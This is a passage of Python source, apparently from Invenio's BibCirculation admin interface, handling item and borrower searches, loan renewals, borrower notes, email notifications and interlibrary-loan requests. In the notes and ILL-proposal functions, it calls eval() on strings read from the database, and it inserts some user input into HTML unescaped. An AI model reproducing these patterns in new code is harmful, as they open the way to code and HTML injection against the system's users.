infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
return item_search(req, infos, ln)
if f == 'barcode':
p = p.strip('\'" \t')
recid = db.get_id_bibrec(p)
if recid is None:
infos.append(_('The barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s does not exist on BibCirculation database.') % {'x_barcode': p, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_item_search(infos=infos, ln=ln)
else:
return get_item_details(req, recid, ln=ln)
elif f == 'recid':
p = p.strip('\'" \t')
recid = p
if not record_exists(recid):
infos.append(_("Requested record does not seem to exist."))
body = bc_templates.tmpl_item_search(infos=infos, ln=ln)
else:
return get_item_details(req, recid, ln=ln)
else:
result = perform_request_search(cc="Books", sc="1", p=p, f=f)
body = bc_templates.tmpl_item_search_result(result=result, ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Item search result"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### "Borrower" related templates
###
def get_borrower_details(req, borrower_id, update, ln=CFG_SITE_LANG):
"""
Display the details of a borrower.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if update and CFG_CERN_SITE:
update_user_info_from_ldap(borrower_id)
borrower = db.get_borrower_details(borrower_id)
if borrower == None:
info = _('Borrower not found.') + ' ' + _('Please, try again.')
return borrower_search(req, info, False, ln)
else:
requests = db.get_borrower_request_details(borrower_id)
loans = db.get_borrower_loan_details(borrower_id)
notes = db.get_borrower_notes(borrower_id)
ill = db.get_ill_requests_details(borrower_id)
proposals = db.get_proposal_requests_details(borrower_id)
req_hist = db.bor_requests_historical_overview(borrower_id)
loans_hist = db.bor_loans_historical_overview(borrower_id)
ill_hist = db.bor_ill_historical_overview(borrower_id)
proposal_hist = db.bor_proposal_historical_overview(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_borrower_details(borrower=borrower,
requests=requests,
loans=loans,
notes=notes,
ill=ill,
proposals=proposals,
req_hist=req_hist,
loans_hist=loans_hist,
ill_hist=ill_hist,
proposal_hist=proposal_hist,
ln=ln)
return page(title=_("Borrower details"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_borrower_step1(req, ln=CFG_SITE_LANG):
"""
Add new borrower. Step 1
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_add_new_borrower_step1(ln=ln)
return page(title=_("Add new borrower") + " - I",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_borrower_step2(req, name, email, phone, address, mailbox,
notes, ln=CFG_SITE_LANG):
"""
Add new borrower. Step 2.
@type name: string.
@type email: string.
@type phone: string.
@type address: string.
@type mailbox: string.
@type notes: string.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if name == '':
infos.append(_("Please, insert a name"))
if email == '':
infos.append(_("Please, insert a valid email address"))
else:
borrower_id = db.get_borrower_id_by_email(email)
if borrower_id is not None:
infos.append(_("There is already a borrower using the following email:")
+ " <strong>%s</strong>" % (email))
tup_infos = (name, email, phone, address, mailbox, notes)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if len(infos) > 0:
body = bc_templates.tmpl_add_new_borrower_step1(tup_infos=tup_infos,
infos=infos, ln=ln)
title = _("Add new borrower") + " - I"
else:
if notes != '':
borrower_notes = {}
note_time = time.strftime("%Y-%m-%d %H:%M:%S")
borrower_notes[note_time] = notes
else:
borrower_notes = ''
borrower_id = db.new_borrower(None, name, email, phone,
address, mailbox, borrower_notes)
return redirect_to_url(req,
'%s/admin2/bibcirculation/get_borrower_details?ln=%s&borrower_id=%s' \
% (CFG_SITE_SECURE_URL, ln, borrower_id))
#body = bc_templates.tmpl_add_new_borrower_step2(tup_infos=tup_infos,
# infos=infos, ln=ln)
#title = _("Add new borrower") + " - II"
return page(title=title,
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def add_new_borrower_step3(req, tup_infos, ln=CFG_SITE_LANG):
"""
Add new borrower. Step 3.
@type tup_infos: tuple.
@param tup_infos: tuple containing borrower information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if tup_infos[5] != '':
borrower_notes = {}
note_time = time.strftime("%Y-%m-%d %H:%M:%S")
borrower_notes[note_time] = str(tup_infos[5])
else:
borrower_notes = ''
db.new_borrower(None, tup_infos[0], tup_infos[1], tup_infos[2],
tup_infos[3], tup_infos[4], str(borrower_notes))
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_add_new_borrower_step3(ln=ln)
return page(title=_("Add new borrower") + " - III",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_borrower_info_step1(req, borrower_id, ln=CFG_SITE_LANG):
"""
Update the borrower's information.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
borrower_details = db.get_borrower_details(borrower_id)
tup_infos = (borrower_details[0], borrower_details[2], borrower_details[3],
borrower_details[4], borrower_details[5], borrower_details[6])
body = bc_templates.tmpl_update_borrower_info_step1(tup_infos=tup_infos,
ln=ln)
return page(title=_("Update borrower information"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def update_borrower_info_step2(req, borrower_id, name, email, phone, address,
mailbox, ln=CFG_SITE_LANG):
"""
Update the borrower's information.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if name == '':
infos.append(_("Please, insert a name"))
if email == '':
infos.append(_("Please, insert a valid email address"))
else:
borrower_email_id = db.get_borrower_id_by_email(email)
if borrower_email_id is not None and borrower_id != borrower_email_id:
infos.append(_("There is already a borrower using the following email:")
+ " <strong>%s</strong>" % (email))
tup_infos = (borrower_id, name, email, phone, address, mailbox)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if len(infos) > 0:
body = bc_templates.tmpl_update_borrower_info_step1(tup_infos=tup_infos,
infos=infos, ln=ln)
else:
db.update_borrower_info(borrower_id, name, email,
phone, address, mailbox)
return redirect_to_url(req,
'%s/admin2/bibcirculation/get_borrower_details?ln=%s&borrower_id=%s' \
% (CFG_SITE_SECURE_URL, ln, borrower_id))
return page(title=_("Update borrower information"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_borrower_requests_details(req, borrower_id, request_id,
ln=CFG_SITE_LANG):
"""
Display loans details of a borrower.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type request_id: integer.
@param request_id: identify the hold request to be cancelled
@return: borrower requests details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if request_id:
db.cancel_request(request_id)
update_request_data(request_id)
result = db.get_borrower_request_details(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
name = db.get_borrower_name(borrower_id)
title = _("Hold requests details") + " - %s" % (name)
body = bc_templates.tmpl_borrower_request_details(result=result,
borrower_id=borrower_id,
ln=ln)
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_borrower_loans_details(req, recid, barcode, borrower_id,
renewal, force, loan_id, ln=CFG_SITE_LANG):
"""
Show borrower's loans details.
@type recid: integer.
@param recid: identify the record. It is also the primary key of
the table bibrec.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type renewal: string.
@param renewal: renew all loans.
@type force: string.
@param force: force the renew of a loan, when usually this is not possible.
@type loan_id: integer.
@param loan_id: identify a loan. It is the primery key of the table
crcLOAN.
@return: borrower loans details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
force_renew_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/get_borrower_loans_details',
{'barcode': barcode, 'borrower_id': borrower_id,
'loan_id': loan_id, 'force': 'true', 'ln': ln},
(_("Yes")))
no_renew_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/get_borrower_loans_details',
{'borrower_id': borrower_id, 'ln': ln},
(_("No")))
if barcode and loan_id and recid:
item_description = db.get_item_description(barcode)
queue = db.get_queue_request(recid, item_description)
new_due_date = renew_loan_for_X_days(barcode)
if len(queue) != 0:
title = book_title_from_MARC(recid)
message = _("Another user is waiting for this book %(x_strong_tag_open)s%(x_title)s%(x_strong_tag_close)s.") % {'x_title': title, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
message += '\n\n'
message += _("Do you want renew this loan anyway?")
message += '\n\n'
message += "[%s] [%s]" % (force_renew_link, no_renew_link)
infos.append(message)
else:
#db.update_due_date(loan_id, new_due_date)
db.renew_loan(loan_id, new_due_date)
#update_status_if_expired(loan_id)
infos.append(_("Loan renewed with success."))
elif loan_id and barcode and force == 'true':
new_due_date = renew_loan_for_X_days(barcode)
db.renew_loan(loan_id, new_due_date)
update_status_if_expired(loan_id)
infos.append(_("Loan renewed with success."))
elif borrower_id and renewal=='true':
list_of_loans = db.get_recid_borrower_loans(borrower_id)
for (loan_id, recid, barcode) in list_of_loans:
item_description = db.get_item_description(barcode)
queue = db.get_queue_request(recid, item_description)
new_due_date = renew_loan_for_X_days(barcode)
force_renewall_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/get_borrower_loans_details',
{'barcode': barcode, 'borrower_id': borrower_id,
'loan_id': loan_id, 'force': 'true', 'ln': ln},
(_("Yes")))
if len(queue) != 0:
title = book_title_from_MARC(recid)
message = _("Another user is waiting for this book %(x_strong_tag_open)s%(x_title)s%(x_strong_tag_close)s.") % {'x_title': title, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
message += '\n\n'
message += _("Do you want renew this loan anyway?")
message += '\n\n'
message += "[%s] [%s]" % (force_renewall_link, no_renew_link)
infos.append(message)
else:
db.renew_loan(loan_id, new_due_date)
update_status_if_expired(loan_id)
if infos == []:
infos.append(_("All loans renewed with success."))
borrower_loans = db.get_borrower_loan_details(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_borrower_loans_details(
borrower_loans=borrower_loans,
borrower_id=borrower_id,
infos=infos, ln=ln)
return page(title=_("Loans details") + \
" - %s" %(db.get_borrower_name(borrower_id)),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def bor_loans_historical_overview(req, borrower_id, ln=CFG_SITE_LANG):
"""
Display the loans historical overview of a borrower.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@return: borrower loans - historical overview.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
loans_hist_overview = db.bor_loans_historical_overview(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_bor_loans_historical_overview(
loans_hist_overview = loans_hist_overview,
ln=ln)
return page(title=_("Loans") + " - " + _("historical overview"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def bor_requests_historical_overview(req, borrower_id, ln=CFG_SITE_LANG):
"""
Display the requests historical overview of a borrower.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@return: borrower requests - historical overview.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
req_hist_overview = db.bor_requests_historical_overview(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_bor_requests_historical_overview(
req_hist_overview = req_hist_overview,
ln=ln)
return page(title=_("Requests") + " - " + _("historical overview"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_borrower_ill_details(req, borrower_id, request_type='', ln=CFG_SITE_LANG):
"""
Display ILL details of a borrower.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type ill_id: integer.
@param ill_id: identify the ILL request. It is also the primary key
of the table crcILLREQUEST.
@return: borrower ILL details.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if request_type == 'proposal-book':
result = db.get_proposal_requests_details(borrower_id)
else:
result = db.get_ill_requests_details(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
name = db.get_borrower_name(borrower_id)
title = _("ILL details") + "- %s" % (name)
body = bc_templates.tmpl_borrower_ill_details(result=result,
borrower_id=borrower_id,
ln=ln)
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def bor_ill_historical_overview(req, borrower_id, request_type='', ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if request_type == 'proposal-book':
result = db.bor_proposal_historical_overview(borrower_id)
else:
result = db.bor_ill_historical_overview(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
name = db.get_borrower_name(borrower_id)
title = _("ILL historical overview") + " - %s" % (name)
body = bc_templates.tmpl_borrower_ill_details(result=result,
borrower_id=borrower_id,
ln=ln)
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def borrower_notification(req, borrower_id, template, message, load_msg_template,
subject, send_message, from_address, ln=CFG_SITE_LANG):
"""
Send an email to a borrower or simply load and display an editable email
template.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type borrower_email: string.
@param borrower_email: The librarian can change the email manually.
In that case, this value will be taken instead
of the that in borrower details.
@type template: string.
@param template: The name of the notification template to be loaded.
If the @param load_msg_template holds True, the
template is not loaded.
@type message: string.
@param message: Message to be sent if the flag @param send_message is set.
@type subject: string.
@param subject: Subject of the message.
@type from_address: string.
@param from_address: From address in the message sent.
@return: Display the email template or send an email to a borrower.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
email = db.get_borrower_email(borrower_id)
if load_msg_template == 'False' and template is not None:
# Do not load the template. It is the email body itself.
body = bc_templates.tmpl_borrower_notification(email=email,
subject=subject,
email_body=template,
borrower_id=borrower_id,
from_address=from_address,
ln=ln)
elif send_message:
send_email(fromaddr = from_address,
toaddr = email,
subject = subject,
content = message,
header = '',
footer = '',
attempt_times = 1,
attempt_sleeptime = 10
)
body = bc_templates.tmpl_send_notification(ln=ln)
else:
show_template = load_template(template)
body = bc_templates.tmpl_borrower_notification(email=email,
subject=subject,
email_body=show_template,
borrower_id=borrower_id,
from_address=from_address,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title="User Notification",
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def get_borrower_notes(req, borrower_id, delete_key, library_notes,
ln=CFG_SITE_LANG):
"""
Retrieve the notes of a borrower.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if delete_key and borrower_id:
if looks_like_dictionary(db.get_borrower_notes(borrower_id)):
borrower_notes = eval(db.get_borrower_notes(borrower_id))
if delete_key in borrower_notes.keys():
del borrower_notes[delete_key]
db.update_borrower_notes(borrower_id, borrower_notes)
elif library_notes:
if db.get_borrower_notes(borrower_id):
if looks_like_dictionary(db.get_borrower_notes(borrower_id)):
borrower_notes = eval(db.get_borrower_notes(borrower_id))
else:
borrower_notes = {}
else:
borrower_notes = {}
note_time = time.strftime("%Y-%m-%d %H:%M:%S")
if note_time not in borrower_notes.keys():
borrower_notes[note_time] = str(library_notes)
db.update_borrower_notes(borrower_id, borrower_notes)
borrower_notes = db.get_borrower_notes(borrower_id)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_borrower_notes(borrower_notes=borrower_notes,
borrower_id=borrower_id,
ln=ln)
return page(title=_("Borrower notes"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def borrower_search(req, empty_barcode, redirect_to_new_request=False,
ln=CFG_SITE_LANG):
"""
Page (for administrator) where is it possible to search
for a borrower (who is on crcBORROWER table) using his/her name,
email, phone or id.
If redirect_to_new_request is False, the returned page will be "Borrower details"
If redirect_to_new_request is True, the returned page will be "New Request"
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
if empty_barcode:
infos.append(empty_barcode)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
body = bc_templates.tmpl_borrower_search(infos=infos,
redirect_to_new_request=redirect_to_new_request,
ln=ln)
if redirect_to_new_request:
title = _("New Request")
else:
title = _("Borrower Search")
return page(title=title,
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def borrower_search_result(req, column, string, redirect_to_new_request=False,
ln=CFG_SITE_LANG):
"""
Search a borrower and return a list with all the possible results.
@type column: string
@param column: identify the column, of the table crcBORROWER, that will be
considered during the search. Can be 'name', 'email' or 'id'.
@type string: string
@param string: string used for the search process.
If redirect_to_new_request is True, the returned page will be "Borrower details"
If redirect_to_new_request is False, the returned page will be "New Request"
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
if string == '':
message = _('Empty string.') + ' ' + _('Please, try again.')
return borrower_search(req, message, redirect_to_new_request, ln)
else:
result = search_user(column, string)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">' \
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
if len(result) == 1:
if redirect_to_new_request:
return create_new_request_step1(req, result[0][0])
else:
return get_borrower_details(req, result[0][0], False, ln)
#return create_new_request_step1(req, borrower_id, p, f, search, ln)
else:
body = bc_templates.tmpl_borrower_search_result(result=result,
redirect_to_new_request=redirect_to_new_request,
ln=ln)
return page(title=_("Borrower search result"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### ILL/Purchase/Acquisition related functions.
### Naming of the methods is not intuitive. Should be improved
### and appropriate documentation added, when required.
### Also, methods could be refactored.
###
def register_ill_from_proposal(req, ill_request_id, bor_id=None, ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
book_info = db.get_ill_book_info(ill_request_id)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
if looks_like_dictionary(book_info):
book_info = eval(book_info)
if not bor_id:
bid = db.get_ill_borrower(ill_request_id)
else:
bid = bor_id
if 'recid' in book_info and bid:
recid = book_info['recid']
if not db.has_loan_request(bid, recid, ill=1):
db.tag_requests_as_done(bid, recid=recid)
library_notes = {}
library_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = \
_("This ILL has been created from a proposal.")
db.register_ill_from_proposal(ill_request_id,
bid, library_notes)
infos.append(_('An ILL has been created for the user.'))
else:
infos.append(_('An active ILL already exists for this user on this record.'))
else:
infos.append(_('Could not create an ILL from the proposal'))
else:
infos.append(_('Could not create an ILL from the proposal'))
ill_req = db.get_ill_requests(CFG_BIBCIRCULATION_ILL_STATUS_NEW)
body = bc_templates.tmpl_list_ill(ill_req, infos=infos, ln=ln)
return page(title=_("ILL requests"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
#return redirect_to_url(req,
# '%s/admin2/bibcirculation/list_proposal?status=%s' % \
# (CFG_SITE_SECURE_URL, CFG_BIBCIRCULATION_PROPOSAL_STATUS_PUT_ASIDE))
def register_ill_request_with_no_recid_step1(req, borrower_id,
ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
body = bc_templates.tmpl_register_ill_request_with_no_recid_step1(
infos=infos,
borrower_id=borrower_id,
admin=True, ln=ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_request_with_no_recid_step2(req, title, authors, place,
publisher, year, edition, isbn, budget_code,
period_of_interest_from, period_of_interest_to,
additional_comments, only_edition, key, string,
borrower_id, ln=CFG_SITE_LANG):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
infos = []
book_info = (title, authors, place, publisher, year, edition, isbn)
request_details = (budget_code, period_of_interest_from,
period_of_interest_to, additional_comments, only_edition)
if borrower_id in (None, '', 'None'):
body = None
if not key:
borrowers_list = None
elif not string:
infos.append(_('Empty string.') + ' ' + _('Please, try again.'))
borrowers_list = None
else:
if validate_date_format(period_of_interest_from) is False:
infos = []
infos.append(_("The period of interest %(x_strong_tag_open)sFrom: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_of_interest_from, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_register_ill_request_with_no_recid_step1(
infos=infos,
borrower_id=None,
admin=True,
ln=ln)
elif validate_date_format(period_of_interest_to) is False:
infos = []
infos.append(_("The period of interest %(x_strong_tag_open)sTo: %(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': period_of_interest_to, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_register_ill_request_with_no_recid_step1(
infos=infos,
ln=ln)
else:
result = search_user(key, string)
borrowers_list = []
if len(result) == 0:
infos.append(_("0 borrowers found."))
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
if body == None:
body = bc_templates.tmpl_register_ill_request_with_no_recid_step2(
book_info=book_info, request_details=request_details,
result=borrowers_list, key=key, string=string,
infos=infos, ln=ln)
else:
user_info = db.get_borrower_data_by_id(borrower_id)
return register_ill_request_with_no_recid_step3(req, title, authors,
place, publisher,year, edition,
isbn, user_info, budget_code,
period_of_interest_from,
period_of_interest_to,
additional_comments, only_edition,
ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_request_with_no_recid_step3(req, title, authors, place,
publisher, year, edition, isbn,
user_info, budget_code,
period_of_interest_from,
period_of_interest_to,
additional_comments,
only_edition, ln=CFG_SITE_LANG):
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
request_details = (budget_code, period_of_interest_from,
period_of_interest_to, additional_comments, only_edition)
book_info = (title, authors, place, publisher, year, edition, isbn)
if user_info is None:
return register_ill_request_with_no_recid_step2(req, title, authors,
place, publisher, year, edition, isbn, budget_code,
period_of_interest_from, period_of_interest_to,
additional_comments, only_edition, 'name', None,
None, ln)
else:
body = bc_templates.tmpl_register_ill_request_with_no_recid_step3(
book_info=book_info,
user_info=user_info,
request_details=request_details,
admin=True,
ln=ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_ill_request_with_no_recid_step4(req, book_info, borrower_id,
request_details, ln):
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a> > <a class="navtrail" ' \
'href="%s/admin2/bibcirculation/loan_on_desk_step1?ln=%s">'\
'Circulation Management' \
'</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL, ln)
_ = gettext_set_language(ln)
(title, authors, place, publisher, year, edition, isbn) = book_info
#create_ill_record(book_info))
(budget_code, period_of_interest_from,
period_of_interest_to, library_notes, only_edition) = request_details
ill_request_notes = {}
if library_notes:
ill_request_notes[time.strftime("%Y-%m-%d %H:%M:%S")] = \
str(library_notes)
### budget_code ###
if db.get_borrower_data_by_id(borrower_id) == None:
_ = gettext_set_language(ln)
infos = []
infos.append(_("<strong>Request not registered:</strong> wrong borrower id"))
body = bc_templates.tmpl_register_ill_request_with_no_recid_step2(
book_info=book_info,
request_details=request_details, result=[],
key='name', string=None, infos=infos, ln=ln)
return page(title=_("Register ILL request"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
else:
book_info = {'title': title, 'authors': authors, 'place': place,
'publisher': publisher,'year' : year, 'edition': edition,
'isbn' : isbn}
db.ill_register_request_on_desk(borrower_id, book_info,
period_of_interest_from,
